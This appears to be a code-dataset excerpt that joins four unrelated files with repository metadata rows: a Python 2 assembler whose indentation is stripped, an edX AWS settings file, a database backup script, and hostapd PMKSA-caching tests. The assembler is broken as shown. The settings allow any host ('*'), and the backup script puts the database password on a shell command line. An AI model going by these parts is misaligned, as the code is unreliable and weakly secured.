except KeyError:
if phase == 2:
                    raise NameError('Unknown identifier ' + str)
val = 0
return val & 0xFFFF
def _output_direct(data):
global pc
pc += 1
if phase == 2:
program.append("%04X" % data)
def add_label(line):
logger.debug("add label '%s'. Pass %d. PC = %d" % (line, phase, pc))
split = line.split('=')
for i in range(len(split)):
split[i] = split[i].strip()
if (phase == 1) and (split[0] in labels):
raise NameError("Label '%s' already exists." % split[0])
if len(split) > 1:
labels[split[0]] = _get_value(split[1])
else:
labels[split[0]] = pc
##########################################################################
##
## PARSE rules for each opcode
##
##########################################################################
def _addr(params, mnem, code):
addr = _get_value(params)
if addr > 0x3FF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _addr_imm(params, mnem, code):
addr = _get_value_imm(params)
if addr > 0x3FF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _data(params, mnem, code):
data = _get_value(params)
logger.info("PC: %03x: %s $%04x" % (pc, mnem, data))
_output_direct(data)
return data
def _block(params, mnem, code):
length = _get_value(params)
logger.info("PC: %03x: %s $%04x" % (pc, mnem, length))
for i in range(length):
_output_direct(0)
return 0
def _addr_io(params, mnem, code):
addr = _get_value(params)
if addr > 0xFF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _no_addr(params, mnem, code):
logger.info("PC: %03x: %04x | %s" % (pc, code, mnem))
_output_direct(code)
return code
def unknown_mnem(params):
print "Unknown mnemonic: '%s'" % params
def dump_bram_init():
bram = [0]*2048
for i in range(len(program)):
inst = int(program[i], 16)
bram[2*i+0] = inst & 0xFF
bram[2*i+1] = (inst >> 8) & 0xFF
for i in range(64):
if (i*16) >= len(program):
break
hx = ''
for j in range(31,-1,-1):
hx = hx + "%02X" % bram[i*32+j]
print " INIT_%02X => X\"%s\"," % (i, hx)
def dump_nan_file(filename):
f = open(filename, "wb")
for i in range(len(program)):
inst = int(program[i], 16)
b1 = inst & 0xFF
b0 = (inst >> 8) & 0xFF
f.write("%c%c" % (b0, b1))
f.close()
mnemonics = {
'LOAD' : ( _addr_imm, 0x0800 ),
'STORE' : ( _addr, 0x8000 ),
'LOADI' : ( _addr, 0x8800 ),
'STORI' : ( _addr, 0x9000 ),
'OR' : ( _addr_imm, 0x1800 ),
'AND' : ( _addr_imm, 0x2800 ),
'XOR' : ( _addr_imm, 0x3800 ),
'ADD' : ( _addr_imm, 0x4800 ),
'SUB' : ( _addr_imm, 0x5800 ),
'CMP' : ( _addr_imm, 0x5000 ),
'ADDC' : ( _addr_imm, 0x6800 ),
'INP' : ( _addr_io, 0x7800 ),
'OUTP' : ( _addr_io, 0xA000 ),
'RET' : ( _no_addr, 0xB800 ),
'BEQ' : ( _addr, 0xC000 ),
'BNE' : ( _addr, 0xC800 ),
'BMI' : ( _addr, 0xD000 ),
'BPL' : ( _addr, 0xD800 ),
    'BRA'   : ( _addr,     0xE000 ),
'CALL' : ( _addr, 0xE800 ),
'BCS' : ( _addr, 0xF000 ),
'BCC' : ( _addr, 0xF800 ),
'.dw' : ( _data, 0x0000 ),
'.blk' : ( _block, 0x0000 )
}
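
# Illustrative sketch (not part of the original tool): how a 16-bit
# instruction word combines the opcode bits from the table above with a
# 10-bit address operand, mirroring what _addr() does for e.g. "BEQ $123".
def _example_opcode_layout():
    code = 0xC000       # opcode bits for BEQ from the mnemonics table
    addr = 0x123        # branch target; must fit in 10 bits (<= 0x3FF)
    return code | addr  # yields 0xC123, the emitted instruction word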
def parse_lines(lines):
global nr
nr = 0
for line in lines:
nr = nr + 1
line = line.rstrip()
comm = line.split(';', 1)
line = comm[0]
if(line.strip() == ''):
continue
line_strip = line.strip()
if line[0] != ' ':
add_label(line.rstrip())
if (phase == 2):
print " ", line
continue
#print "Line: '%s'" % line_strip
line_split = line_strip.split(" ", 1)
if len(line_split) == 1:
line_split.append("")
        mnem = line_split[0]
try:
(f, code) = mnemonics[mnem]
except KeyError,e:
raise NameError("Unknown Mnemonic %s in line %d" % (mnem, nr))
try:
code = f(line_split[1].strip(), mnem, code)
except IndexError,e:
raise ValueError("Value error in line %d" % (nr,))
if (phase == 2):
print "%03X: %04X | " % (pc-1, code),line
def resolve_immediates():
global pc
for imm in imm_expr:
        imm_dict[_get_value(imm)] = 0
for imm in imm_dict:
imm_dict[imm] = pc
imm_values.append(imm)
pc += 1
#print imm_expr
#print imm_dict
#print imm_values
if __name__ == "__main__":
inputfile = 'nano_code.nan'
outputfile = 'nano_code.b'
if len(sys.argv)>1:
inputfile = sys.argv[1]
if len(sys.argv)>2:
outputfile = sys.argv[2]
f = open(inputfile, 'r')
lines = f.readlines()
pc = 0
phase = 1
logger.info("Pass 1...")
parse_lines(lines)
# print labels
resolve_immediates()
pc = 0
phase = 2
logger.info("Pass 2...")
logger.setLevel(logging.WARN)
parse_lines(lines)
for imm in imm_values:
logger.info("PC: %03x: .dw $%04x" % (pc, imm))
_output_direct(imm)
dump_bram_init()
dump_nan_file(outputfile)
|
gpl-3.0
| 1,242,725,368,680,759,300 | 26.356 | 76 | 0.481942 | false |
hamzehd/edx-platform
|
cms/envs/aws.py
|
1
|
14975
|
"""
This is the default template for our main set of AWS servers.
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
import json
from .common import *
from openedx.core.lib.logsettings import get_logger_config
import os
from path import Path as path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# SERVICE_VARIANT specifies name of the variant used, which decides what JSON
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the JSON configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the JSON configuration files,
# based on the service variant. If no variant is use, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
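
# Illustrative sketch (not part of the settings): with SERVICE_VARIANT set to
# "cms" and CONFIG_ROOT left at ENV_ROOT, the files loaded further below are
# <ENV_ROOT>/cms.env.json and <ENV_ROOT>/cms.auth.json.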
############### ALWAYS THE SAME ################################
DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
# IMPORTANT: With this enabled, the server must always be behind a proxy that
# strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise,
# a user can fool our server into thinking it was an https connection.
# See
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
# for other warnings.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
###################################### CELERY ################################
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'djcelery.backends.cache:CacheBackend'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
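
# Illustrative sketch (not part of the settings): with CONFIG_PREFIX "cms.",
# the names above resolve to exchange "edx.cms.core" and queues
# "edx.cms.core.high", "edx.cms.core.default" and "edx.cms.core.low".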
############# NON-SECURE ENV CONFIG ##############################
# Things like server locations, ports, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.json") as env_file:
ENV_TOKENS = json.load(env_file)
# STATIC_URL_BASE specifies the base url to use for static files
STATIC_URL_BASE = ENV_TOKENS.get('STATIC_URL_BASE', None)
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
STATIC_URL += EDX_PLATFORM_REVISION + "/"
# GITHUB_REPO_ROOT is the base directory
# for course data
GITHUB_REPO_ROOT = ENV_TOKENS.get('GITHUB_REPO_ROOT', GITHUB_REPO_ROOT)
# STATIC_ROOT specifies the directory where static files are
# collected
STATIC_ROOT_BASE = ENV_TOKENS.get('STATIC_ROOT_BASE', None)
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE) / EDX_PLATFORM_REVISION
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
EMAIL_FILE_PATH = ENV_TOKENS.get('EMAIL_FILE_PATH', None)
EMAIL_HOST = ENV_TOKENS.get('EMAIL_HOST', EMAIL_HOST)
EMAIL_PORT = ENV_TOKENS.get('EMAIL_PORT', EMAIL_PORT)
EMAIL_USE_TLS = ENV_TOKENS.get('EMAIL_USE_TLS', EMAIL_USE_TLS)
LMS_BASE = ENV_TOKENS.get('LMS_BASE')
# Note that FEATURES['PREVIEW_LMS_BASE'] gets read in from the environment file.
SITE_NAME = ENV_TOKENS['SITE_NAME']
ALLOWED_HOSTS = [
# TODO: bbeggs remove this before prod, temp fix to get load testing running
"*",
ENV_TOKENS.get('CMS_BASE')
]
LOG_DIR = ENV_TOKENS['LOG_DIR']
CACHES = ENV_TOKENS['CACHES']
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
SESSION_COOKIE_DOMAIN = ENV_TOKENS.get('SESSION_COOKIE_DOMAIN')
SESSION_COOKIE_HTTPONLY = ENV_TOKENS.get('SESSION_COOKIE_HTTPONLY', True)
SESSION_ENGINE = ENV_TOKENS.get('SESSION_ENGINE', SESSION_ENGINE)
SESSION_COOKIE_SECURE = ENV_TOKENS.get('SESSION_COOKIE_SECURE', SESSION_COOKIE_SECURE)
SESSION_SAVE_EVERY_REQUEST = ENV_TOKENS.get('SESSION_SAVE_EVERY_REQUEST', SESSION_SAVE_EVERY_REQUEST)
# social sharing settings
SOCIAL_SHARING_SETTINGS = ENV_TOKENS.get('SOCIAL_SHARING_SETTINGS', SOCIAL_SHARING_SETTINGS)
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if ENV_TOKENS.get('SESSION_COOKIE_NAME', None):
# NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(ENV_TOKENS.get('SESSION_COOKIE_NAME'))
# Set the names of cookies shared with the marketing site
# These have the same cookie domain as the session, which in production
# usually includes subdomains.
EDXMKTG_LOGGED_IN_COOKIE_NAME = ENV_TOKENS.get('EDXMKTG_LOGGED_IN_COOKIE_NAME', EDXMKTG_LOGGED_IN_COOKIE_NAME)
EDXMKTG_USER_INFO_COOKIE_NAME = ENV_TOKENS.get('EDXMKTG_USER_INFO_COOKIE_NAME', EDXMKTG_USER_INFO_COOKIE_NAME)
# Email overrides
DEFAULT_FROM_EMAIL = ENV_TOKENS.get('DEFAULT_FROM_EMAIL', DEFAULT_FROM_EMAIL)
DEFAULT_FEEDBACK_EMAIL = ENV_TOKENS.get('DEFAULT_FEEDBACK_EMAIL', DEFAULT_FEEDBACK_EMAIL)
ADMINS = ENV_TOKENS.get('ADMINS', ADMINS)
SERVER_EMAIL = ENV_TOKENS.get('SERVER_EMAIL', SERVER_EMAIL)
MKTG_URLS = ENV_TOKENS.get('MKTG_URLS', MKTG_URLS)
TECH_SUPPORT_EMAIL = ENV_TOKENS.get('TECH_SUPPORT_EMAIL', TECH_SUPPORT_EMAIL)
COURSES_WITH_UNSAFE_CODE = ENV_TOKENS.get("COURSES_WITH_UNSAFE_CODE", [])
ASSET_IGNORE_REGEX = ENV_TOKENS.get('ASSET_IGNORE_REGEX', ASSET_IGNORE_REGEX)
# Theme overrides
THEME_NAME = ENV_TOKENS.get('THEME_NAME', None)
# Timezone overrides
TIME_ZONE = ENV_TOKENS.get('TIME_ZONE', TIME_ZONE)
# Push to LMS overrides
GIT_REPO_EXPORT_DIR = ENV_TOKENS.get('GIT_REPO_EXPORT_DIR', '/edx/var/edxapp/export_course_repos')
# Translation overrides
LANGUAGES = ENV_TOKENS.get('LANGUAGES', LANGUAGES)
LANGUAGE_CODE = ENV_TOKENS.get('LANGUAGE_CODE', LANGUAGE_CODE)
USE_I18N = ENV_TOKENS.get('USE_I18N', USE_I18N)
ENV_FEATURES = ENV_TOKENS.get('FEATURES', {})
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
# Additional installed apps
for app in ENV_TOKENS.get('ADDL_INSTALLED_APPS', []):
INSTALLED_APPS += (app,)
WIKI_ENABLED = ENV_TOKENS.get('WIKI_ENABLED', WIKI_ENABLED)
LOGGING = get_logger_config(LOG_DIR,
logging_env=ENV_TOKENS['LOGGING_ENV'],
debug=False,
service_variant=SERVICE_VARIANT)
# Theming
PLATFORM_NAME = ENV_TOKENS.get('PLATFORM_NAME', 'edX')
STUDIO_NAME = ENV_TOKENS.get('STUDIO_NAME', 'edX Studio')
STUDIO_SHORT_NAME = ENV_TOKENS.get('STUDIO_SHORT_NAME', 'Studio')
# Event Tracking
if "TRACKING_IGNORE_URL_PATTERNS" in ENV_TOKENS:
TRACKING_IGNORE_URL_PATTERNS = ENV_TOKENS.get("TRACKING_IGNORE_URL_PATTERNS")
# Django CAS external authentication settings
CAS_EXTRA_LOGIN_PARAMS = ENV_TOKENS.get("CAS_EXTRA_LOGIN_PARAMS", None)
if FEATURES.get('AUTH_USE_CAS'):
CAS_SERVER_URL = ENV_TOKENS.get("CAS_SERVER_URL", None)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
CAS_ATTRIBUTE_CALLBACK = ENV_TOKENS.get('CAS_ATTRIBUTE_CALLBACK', None)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
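        # Illustrative sketch (not part of the settings): CAS_ATTRIBUTE_CALLBACK
        # is expected to be a dict such as
        # {"module": "myapp.cas_callbacks", "function": "user_details"}
        # (hypothetical names), resolved by the importlib lookup above.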
################ SECURE AUTH ITEMS ###############################
# Secret things: passwords, access keys, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.json") as auth_file:
AUTH_TOKENS = json.load(auth_file)
############### XBlock filesystem field config ##########
if 'DJFS' in AUTH_TOKENS and AUTH_TOKENS['DJFS'] is not None:
DJFS = AUTH_TOKENS['DJFS']
if 'url_root' in DJFS:
DJFS['url_root'] = DJFS['url_root'].format(platform_revision=EDX_PLATFORM_REVISION)
EMAIL_HOST_USER = AUTH_TOKENS.get('EMAIL_HOST_USER', EMAIL_HOST_USER)
EMAIL_HOST_PASSWORD = AUTH_TOKENS.get('EMAIL_HOST_PASSWORD', EMAIL_HOST_PASSWORD)
# Note that this is the Studio key for Segment. There is a separate key for the LMS.
CMS_SEGMENT_KEY = AUTH_TOKENS.get('SEGMENT_KEY')
SECRET_KEY = AUTH_TOKENS['SECRET_KEY']
AWS_ACCESS_KEY_ID = AUTH_TOKENS["AWS_ACCESS_KEY_ID"]
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS["AWS_SECRET_ACCESS_KEY"]
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
if AUTH_TOKENS.get('DEFAULT_FILE_STORAGE'):
DEFAULT_FILE_STORAGE = AUTH_TOKENS.get('DEFAULT_FILE_STORAGE')
elif AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY:
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
else:
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
DATABASES = AUTH_TOKENS['DATABASES']
# Enable automatic transaction management on all databases
# https://docs.djangoproject.com/en/1.8/topics/db/transactions/#tying-transactions-to-http-requests
# This needs to be true for all databases
for database_name in DATABASES:
DATABASES[database_name]['ATOMIC_REQUESTS'] = True
MODULESTORE = convert_module_store_setting_if_needed(AUTH_TOKENS.get('MODULESTORE', MODULESTORE))
CONTENTSTORE = AUTH_TOKENS['CONTENTSTORE']
DOC_STORE_CONFIG = AUTH_TOKENS['DOC_STORE_CONFIG']
# Datadog for events!
DATADOG = AUTH_TOKENS.get("DATADOG", {})
DATADOG.update(ENV_TOKENS.get("DATADOG", {}))
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
# Celery Broker
CELERY_ALWAYS_EAGER = ENV_TOKENS.get("CELERY_ALWAYS_EAGER", False)
CELERY_BROKER_TRANSPORT = ENV_TOKENS.get("CELERY_BROKER_TRANSPORT", "")
CELERY_BROKER_HOSTNAME = ENV_TOKENS.get("CELERY_BROKER_HOSTNAME", "")
CELERY_BROKER_VHOST = ENV_TOKENS.get("CELERY_BROKER_VHOST", "")
CELERY_BROKER_USER = AUTH_TOKENS.get("CELERY_BROKER_USER", "")
CELERY_BROKER_PASSWORD = AUTH_TOKENS.get("CELERY_BROKER_PASSWORD", "")
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
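# Illustrative sketch (not part of the settings): with hypothetical values
# ("amqp", "celery", "secret", "rabbit.internal", "cms") the format above
# yields BROKER_URL = "amqp://celery:secret@rabbit.internal/cms".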
# Event tracking
TRACKING_BACKENDS.update(AUTH_TOKENS.get("TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS['tracking_logs']['OPTIONS']['backends'].update(AUTH_TOKENS.get("EVENT_TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS['segmentio']['OPTIONS']['processors'][0]['OPTIONS']['whitelist'].extend(
AUTH_TOKENS.get("EVENT_TRACKING_SEGMENTIO_EMIT_WHITELIST", []))
SUBDOMAIN_BRANDING = ENV_TOKENS.get('SUBDOMAIN_BRANDING', {})
VIRTUAL_UNIVERSITIES = ENV_TOKENS.get('VIRTUAL_UNIVERSITIES', [])
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", 5)
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", 15 * 60)
MICROSITE_CONFIGURATION = ENV_TOKENS.get('MICROSITE_CONFIGURATION', {})
MICROSITE_ROOT_DIR = path(ENV_TOKENS.get('MICROSITE_ROOT_DIR', ''))
#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = ENV_TOKENS.get("PASSWORD_MIN_LENGTH")
PASSWORD_MAX_LENGTH = ENV_TOKENS.get("PASSWORD_MAX_LENGTH")
PASSWORD_COMPLEXITY = ENV_TOKENS.get("PASSWORD_COMPLEXITY", {})
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = ENV_TOKENS.get("PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD")
PASSWORD_DICTIONARY = ENV_TOKENS.get("PASSWORD_DICTIONARY", [])
### INACTIVITY SETTINGS ####
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = AUTH_TOKENS.get("SESSION_INACTIVITY_TIMEOUT_IN_SECONDS")
##### X-Frame-Options response header settings #####
X_FRAME_OPTIONS = ENV_TOKENS.get('X_FRAME_OPTIONS', X_FRAME_OPTIONS)
##### ADVANCED_SECURITY_CONFIG #####
ADVANCED_SECURITY_CONFIG = ENV_TOKENS.get('ADVANCED_SECURITY_CONFIG', {})
################ ADVANCED COMPONENT/PROBLEM TYPES ###############
ADVANCED_COMPONENT_TYPES = ENV_TOKENS.get('ADVANCED_COMPONENT_TYPES', ADVANCED_COMPONENT_TYPES)
ADVANCED_PROBLEM_TYPES = ENV_TOKENS.get('ADVANCED_PROBLEM_TYPES', ADVANCED_PROBLEM_TYPES)
DEPRECATED_ADVANCED_COMPONENT_TYPES = ENV_TOKENS.get(
'DEPRECATED_ADVANCED_COMPONENT_TYPES', DEPRECATED_ADVANCED_COMPONENT_TYPES
)
################ VIDEO UPLOAD PIPELINE ###############
VIDEO_UPLOAD_PIPELINE = ENV_TOKENS.get('VIDEO_UPLOAD_PIPELINE', VIDEO_UPLOAD_PIPELINE)
################ PUSH NOTIFICATIONS ###############
PARSE_KEYS = AUTH_TOKENS.get("PARSE_KEYS", {})
# Video Caching. Pairing country codes with CDN URLs.
# Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='}
VIDEO_CDN_URL = ENV_TOKENS.get('VIDEO_CDN_URL', {})
if FEATURES['ENABLE_COURSEWARE_INDEX'] or FEATURES['ENABLE_LIBRARY_INDEX']:
# Use ElasticSearch for the search engine
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
XBLOCK_SETTINGS = ENV_TOKENS.get('XBLOCK_SETTINGS', {})
XBLOCK_SETTINGS.setdefault("VideoDescriptor", {})["licensing_enabled"] = FEATURES.get("LICENSING", False)
XBLOCK_SETTINGS.setdefault("VideoModule", {})['YOUTUBE_API_KEY'] = AUTH_TOKENS.get('YOUTUBE_API_KEY', YOUTUBE_API_KEY)
################# PROCTORING CONFIGURATION ##################
PROCTORING_BACKEND_PROVIDER = AUTH_TOKENS.get("PROCTORING_BACKEND_PROVIDER", PROCTORING_BACKEND_PROVIDER)
PROCTORING_SETTINGS = ENV_TOKENS.get("PROCTORING_SETTINGS", PROCTORING_SETTINGS)
|
agpl-3.0
| -5,478,946,343,448,647,000 | 39.915301 | 120 | 0.71005 | false |
HSZemi/stre
|
backup/backup.py
|
1
|
2484
|
#! /usr/bin/env python3
import sys
sys.path.append('../')
import stre.settings
import datetime
import subprocess
host = stre.settings.DATABASES['default']['HOST']
user = stre.settings.DATABASES['default']['USER']
password = stre.settings.DATABASES['default']['PASSWORD']
name = stre.settings.DATABASES['default']['NAME']
gpg_target_id = stre.settings.GPG_TARGET_ID
basename = "{0.year:04d}{0.month:02d}{0.day:02d}_{0.hour:02d}{0.minute:02d}{0.second:02d}".format(datetime.datetime.now())
commands = {}
commands_cleanup = {}
commands['sql'] = "mysqldump --host={host} --user={user} --password={password} --databases {name} --result-file={basename}.sql".format(host=host, user=user, password=password, name=name, basename=basename)
commands['briefe_zip'] = "zip -r {basename}_briefe.zip ../dokumente/briefe/*".format(basename=basename)
commands['export_zip'] = "zip -r {basename}_export.zip ../dokumente/export/*".format(basename=basename)
commands['nachweise_zip'] = "zip -r {basename}_nachweise.zip ../dokumente/nachweise/*".format(basename=basename)
commands['bundle'] = "zip {basename}.zip {basename}.sql {basename}_briefe.zip {basename}_export.zip {basename}_nachweise.zip".format(basename=basename)
commands['encrypt'] = "gpg --output {basename}.zip.gpg --encrypt --recipient {gpg_target_id} {basename}.zip".format(basename=basename, gpg_target_id=gpg_target_id)
commands_cleanup['sql'] = "rm {basename}.sql".format(basename=basename)
commands_cleanup['briefe_zip'] = "rm {basename}_briefe.zip".format(basename=basename)
commands_cleanup['export_zip'] = "rm {basename}_export.zip".format(basename=basename)
commands_cleanup['nachweise_zip'] = "rm {basename}_nachweise.zip".format(basename=basename)
commands_cleanup['zip'] = "rm {basename}.zip".format(basename=basename)
print("Storing backup as {}.gpg".format(basename))
subprocess.run(commands['sql'], shell=True)
subprocess.run(commands['briefe_zip'], shell=True)
subprocess.run(commands['export_zip'], shell=True)
subprocess.run(commands['nachweise_zip'], shell=True)
subprocess.run(commands['bundle'], shell=True)
subprocess.run(commands['encrypt'], shell=True)
print("Removing temporary files")
subprocess.run(commands_cleanup['sql'], shell=True)
subprocess.run(commands_cleanup['briefe_zip'], shell=True)
subprocess.run(commands_cleanup['export_zip'], shell=True)
subprocess.run(commands_cleanup['nachweise_zip'], shell=True)
subprocess.run(commands_cleanup['zip'], shell=True)
print("Backup file created.")
|
gpl-3.0
| 6,190,831,153,205,049,000 | 44.163636 | 205 | 0.739533 | false |
aelarabawy/hostap
|
tests/hwsim/test_pmksa_cache.py
|
1
|
23504
|
# WPA2-Enterprise PMKSA caching tests
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import subprocess
import time
import hostapd
from wpasupplicant import WpaSupplicant
from test_ap_eap import eap_connect
def test_pmksa_cache_on_roam_back(dev, apdev):
"""PMKSA cache to skip EAP on reassociation back to same AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
# It can take some time for the second AP to become ready to reply to Probe
    # Request frames, especially under heavy CPU load, so allow a couple of rounds
# of scanning to avoid reporting errors incorrectly just because of scans
# not having seen the target AP.
for i in range(0, 10):
dev[0].scan(freq="2412")
if dev[0].get_bss(bssid2) is not None:
break
logger.info("Scan again to find target AP")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry found")
if pmksa2['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
dev[0].dump_monitor()
if "FAIL" in dev[0].request("PMKSA_FLUSH"):
raise Exception("PMKSA_FLUSH failed")
if dev[0].get_pmksa(bssid) is not None or dev[0].get_pmksa(bssid2) is not None:
raise Exception("PMKSA_FLUSH did not remove PMKSA entries")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("Disconnection event timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=15)
if ev is None:
raise Exception("Reconnection timed out")
def test_pmksa_cache_opportunistic_only_on_sta(dev, apdev):
"""Opportunistic PMKSA caching enabled only on station"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan(freq="2412")
